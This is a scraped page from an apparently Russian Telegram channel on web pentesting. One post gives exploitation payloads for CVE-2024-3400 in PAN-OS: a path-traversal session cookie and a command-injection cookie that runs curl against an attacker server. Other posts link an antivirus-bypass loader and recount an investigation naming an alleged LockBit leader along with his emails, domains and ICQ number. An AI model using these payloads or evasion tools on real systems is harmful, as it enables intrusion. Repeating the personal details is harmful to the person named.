Записки Лизы

Description
Небольшой канал по тематике web пентеста, отчёты об уязвимостях, инструментах, а также способах защиты
Advertising
We recommend to visit
Mash
Mash
3,109,891 @mash

Прислать новость, фото, видео, аудио, бересту: @in_mash_bot

Покупка рекламы: @marina_mousse

Помахаться и обсудить новости: @mash_chat

Регистрация в перечне РКН:
https://knd.gov.ru/license?id=6726d0b5db0c1931b12fc77f&registryType=bloggersPermission

Last updated 7 hours ago

Из России с любовью и улыбкой :)

From Russia with love and a smile :)

Chat - @ShutkaUm

@Shutka_U

Last updated 1 month, 2 weeks ago

Почистили канал, тут будут только реакты на ТВ шоу

Ожидаем ответа от ТВ

6 months, 3 weeks ago

CVE-2024-3400 - внедрение команд ОС в функции PAN-OS

Если же говорить об эксплуатации :
В куках SESSID можно сделать os command injection

Запись файла

Cookie: SESSID=/../../../opt/panlogs/tmp/device\_telemetry/minute/hellothere

Os command injection же можно сделать вот так:

Cookie: SESSID=/../../../opt/panlogs/tmp/device\_telemetry/minute/hellothere`curl${IFS}http://<you\_server>`

7 months ago

Лидер LockBit Дмитрий Хорошев? ?**

На прошлой неделе США вместе с Великобританией и Австралией выдвинули обвинения и ввели санкции против Дмитрия  Хорошева, который, как полагают, является лидером атакующей группы LockBit.

Пользователь LockBitSupp оперативно отреагировал на претензии, заявив, что допустил ошибку и это был не он. Увидев заявление, Брайан Крабс решил разобраться в этом вопросе.

По данным DomainTools, адрес электронной почты sitedev5@yandex[.]ru» использовался для регистрации нескольких доменов, в том числе зарегистрированного на имя Хорошева бизнеса под названием «tkaner[.]com» (блог одежды).

В ходе поиска Constella Intelligence номера телефона, указанного в регистрационных документах Тканера, было обнаружено несколько официальных документов, подтверждающих право собственности на номер Дмитрия Хорошева.

Другой домен, зарегистрированный на этот номер телефона, «Stairwell[.]ru» (сайт, предлагающий деревянные лестницы), больше не активен. DomainTools сообщает, что этот домен в течение нескольких лет содержал имя «Дмитрий Ю Хорошев» и адрес электронной почты «pin@darktower[.]su».

По данным Constella Intelligence, этот адрес использовался в 2010 году для регистрации аккаунта Дмитрия Хоршева у хостинг-провайдера FirstVDS. Кроме того, Intel 471 обнаружил, что этот же адрес использовался русскоязычным участником форума под ником «Пин» на хакерском форуме Opensc, где «Пин» был особенно активен в 2012 году и много писал о проблемах с шифрованием данных. и обход механизмов безопасности Windows.

На форуме Античата форумчанин «Пин» рекомендовал связаться с ним по номеру ICQ 669316. По данным Intel 471, этот номер ICQ был зарегистрирован на форуме Zloy в апреле 2011 года под именем «NeroWolfe» с адресом «d.horochev@gmail». [ ]com» и IP-адрес из Воронежа (Россия).

Пользователь «NeroWolfe» также использовал те же пароли, что и «Stairwell(.)ru», и зарегистрировался более чем на десяти других киберфорумах в период с 2011 по 2015 год. «NeroWolfe» представлял себя системным администратором и программистом C++ и предлагал услуги по установке вредоносного ПО и разработке новых способов взлома веб-браузеров.

В 2019 году пользователь под псевдонимом «Путинкраб» начал предлагать исходный код программы-вымогателя на таких киберфорумах, как XSS, Exploit и UFOLabs. В апреле 2019 года он запустил партнёрскую программу с распределением прибыли 20/80 в пользу партнёров. Последний пост пользователя с этим ником был опубликован 23 августа 2019 года.

Минюст сообщает, что спустя пять месяцев был официально запущен партнерский проект LockBit, предположительно возглавляемый Хорошевым, но под псевдонимом «LockBitSupp». Кроме того, оригинальная программа-вымогатель LockBit была написана на языке программирования C, в котором NeroWolfe был экспертом.

Пока не доказано, что Хорошев определенно является «LockBitSupp», но вся его деятельность на протяжении многих лет указывает на глубокую причастность к различным схемам киберпреступлений, включая ботнеты, кражу данных и вредоносное ПО. Хорошев продемонстрировал мастерство в криптографии и планировании преступлений, что явно сделало его востребованным в индустрии RaaS.

В феврале 2024 года ФБР проникло в инфраструктуру LockBit в Луке в рамках операции «Кронос». Учитывая обвинения, выдвинутые против Хорошева и других членов LockBit, власти, вероятно, располагают обширной информацией о деятельности группы.

Кроме того, вскоре после обвинений против Хорошева несколько независимых исследователей безопасности обнаружили десятки кредитных карт и банковских счетов, связанных с ним. Все они, безусловно, впечатляют своими суммами.

8 months, 2 weeks ago

https://github.com/Cipher7/ChaiLdr

?? Loader для обхода AV
-----
?? Loader for bypass AV

GitHub

GitHub - Cipher7/ChaiLdr: AV bypass while you sip your Chai!

AV bypass while you sip your Chai! Contribute to Cipher7/ChaiLdr development by creating an account on GitHub.

9 months, 1 week ago

?? Хотите интервью с админом одного из крупнейших каналов, ориентирующийся на сливы баз данных?
----
?? Want an interview with the admin of one of the biggest channels focusing on database leaks?

We recommend to visit
Mash
Mash
3,109,891 @mash

Прислать новость, фото, видео, аудио, бересту: @in_mash_bot

Покупка рекламы: @marina_mousse

Помахаться и обсудить новости: @mash_chat

Регистрация в перечне РКН:
https://knd.gov.ru/license?id=6726d0b5db0c1931b12fc77f&registryType=bloggersPermission

Last updated 7 hours ago

Из России с любовью и улыбкой :)

From Russia with love and a smile :)

Chat - @ShutkaUm

@Shutka_U

Last updated 1 month, 2 weeks ago

Почистили канал, тут будут только реакты на ТВ шоу

Ожидаем ответа от ТВ